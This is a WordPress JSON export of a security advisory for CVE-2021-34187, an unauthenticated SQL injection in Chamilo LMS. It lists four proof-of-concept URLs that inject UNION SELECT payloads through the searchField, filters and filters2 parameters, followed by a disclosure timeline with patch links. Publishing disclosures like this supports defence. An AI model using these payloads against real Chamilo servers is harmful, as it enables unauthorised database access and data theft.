{"id":118,"date":"2021-06-20T10:48:30","date_gmt":"2021-06-20T04:48:30","guid":{"rendered":"https:\/\/murat.one\/?p=118"},"modified":"2021-06-30T11:31:36","modified_gmt":"2021-06-30T05:31:36","slug":"unauthenticated-sql-injection-in-chamilo-lms-1-11-x-and-dev-version-of-2-0","status":"publish","type":"post","link":"https:\/\/murat.one\/?p=118","title":{"rendered":"CVE-2021-34187. Unauthenticated SQL injection in Chamilo LMS 1.11.x and (dev version of) 2.0"},"content":{"rendered":"\n<p><strong>Product:<\/strong> Chamilo LMS 1.11.x, 2.x<\/p>\n\n\n\n<p><strong>Vulnerability:<\/strong> SQL injection<\/p>\n\n\n\n<p><strong>Author:<\/strong> Kutlymurat Mambetniyazov (@manfromkz)<\/p>\n\n\n\n<p><strong>Acknowledgements: <\/strong>NitroTeam.kz<\/p>\n\n\n\n<p><strong>Date:<\/strong> 05\/25\/2021<\/p>\n\n\n\n<p><strong>Description: <\/strong>Lack of sanitization of GET-parameters searchField, filters, filters2 in \/main\/inc\/ajax\/model.ajax.php leads to the multiple unauthorized SQL injections<\/p>\n\n\n\n<p><strong>Tested on: <\/strong>Windows 10 x64, Apache 2.4, 10.3.22-MariaDB, PHP 7.4, Chamilo LMS 1.11.x and 2.x.<\/p>\n\n\n\n<p><strong>PoC:<\/strong><\/p>\n\n\n\n<p><strong>Version 1.11.x, parameter &#8211; searchField<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;chamilo1.11.x\/main\/inc\/ajax\/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_search=1&amp;searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+version())),NULL,NULL,NULL--%20-)and((1=&amp;searchOper=ni&amp;searchString=testx&amp;filters2={}&amp;from_course_session=0<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"193\" src=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/1.1_searchField-1024x193.png\" alt=\"\" class=\"wp-image-121\" srcset=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/1.1_searchField-1024x193.png 1024w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/1.1_searchField-300x57.png 300w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/1.1_searchField-768x145.png 768w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/1.1_searchField-1536x289.png 1536w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/1.1_searchField-1568x295.png 1568w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/1.1_searchField.png 1799w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Version 2.x, parameter &#8211; searchField<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;chamilo2.x\/main\/inc\/ajax\/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_search=1&amp;searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(version()))))),NULL,NULL,NULL--%20-)and((1=&amp;searchOper=ni&amp;searchString=testx&amp;filters2={}&amp;from_course_session=0<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"463\" src=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/2_searchField-1024x463.png\" alt=\"\" class=\"wp-image-123\" srcset=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/2_searchField-1024x463.png 1024w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/2_searchField-300x136.png 300w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/2_searchField-768x347.png 768w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/2_searchField-1536x694.png 1536w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/2_searchField-1568x708.png 1568w, https:\/\/murat.one\/wp-content\/uploads\/2021\/06\/2_searchField.png 1651w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Parameters: filters, filters2<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;chamilo\/main\/inc\/ajax\/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_force_search=1&amp;search=1&amp;searchField=1&amp;searchOper=ni&amp;searchString=testx&amp;filters={%22rules%22:&#91;{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&amp;from_course_session=0<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;chamilo\/main\/inc\/ajax\/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_force_search=1&amp;search=1&amp;searchField=1&amp;searchOper=ni&amp;searchString=testx&amp;filters2={%22rules%22:&#91;{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&amp;from_course_session=0<\/code><\/pre>\n\n\n\n<p><strong>Timeline of the vulnerability:<\/strong><\/p>\n\n\n\n<p>05\/25\/2021 &#8211; vulnerability discover<br>05\/27\/2021 &#8211; notification to vendor<br>05\/28\/2021 &#8211; confirmation by vendor and patch release (version 1.11.x &#8211; <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/chamilo\/chamilo-lms\/commit\/f7f93579ed64765c2667910b9c24d031b0a00571\" target=\"_blank\">https:\/\/github.com\/chamilo\/chamilo-lms\/commit\/f7f93579ed64765c2667910b9c24d031b0a00571<\/a> and version 2.x &#8211; <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/chamilo\/chamilo-lms\/commit\/005dc8e9eccc6ea35264064ae09e2e84af8d5b59\" target=\"_blank\">https:\/\/github.com\/chamilo\/chamilo-lms\/commit\/005dc8e9eccc6ea35264064ae09e2e84af8d5b59<\/a>)<br>06\/01\/2021 &#8211; published on vendors issue tracker (<a rel=\"noreferrer noopener\" href=\"https:\/\/support.chamilo.org\/projects\/1\/wiki\/Security_issues#Issue-67-2021-05-27-High-impact-very-high-risk-Unauthenticated-SQL-injection\" target=\"_blank\">https:\/\/support.chamilo.org\/projects\/1\/wiki\/Security_issues#Issue-67-2021-05-27-High-impact-very-high-risk-Unauthenticated-SQL-injection<\/a>)<br>06\/20\/2021 &#8211; published<br>06\/28\/2021 &#8211; CVE-2021-34187 was assigned by MITRE<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lack of sanitization of GET-parameters searchField, filters, filters2 in \/main\/inc\/ajax\/model.ajax.php leads to the multiple unauthorized SQL injections in Chamilo LMS 1.11.x and (dev version of) 2.0<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[10,14],"tags":[19,18,17,16],"_links":{"self":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/118"}],"collection":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=118"}],"version-history":[{"count":11,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/118\/revisions"}],"predecessor-version":[{"id":135,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/118\/revisions\/135"}],"wp:attachment":[{"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=118"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}